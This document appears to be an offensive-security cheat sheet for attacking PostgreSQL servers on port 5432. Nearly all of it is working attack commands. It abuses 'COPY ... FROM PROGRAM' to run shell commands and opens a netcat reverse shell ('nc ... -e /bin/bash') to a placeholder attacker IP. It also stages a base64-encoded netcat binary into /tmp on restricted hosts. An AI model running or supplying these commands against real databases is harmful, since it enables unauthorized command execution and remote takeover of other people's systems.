tcp/5432 postgres

• RCE

> create table logs (value text);
> delete from logs; copy logs (value) from program 'whoami'; select * from logs;
> delete from logs; copy logs (value) from program 'nc -v <ip> <port> -e /bin/bash'; select * from logs;

• For very restricted hosts, use base64 to transfer nc

> base64 -w 0 < /usr/bin/nc > nc.txt
> delete from logs; copy logs (value) from program 'echo [base64_content] > /tmp/nc.txt'; select * from logs;
> delete from logs; copy logs (value) from program 'base64 -d /tmp/nc.txt > /tmp/nc'; select * from logs;
> delete from logs; copy logs (value) from program 'chmod u+x /tmp/nc'; select * from logs;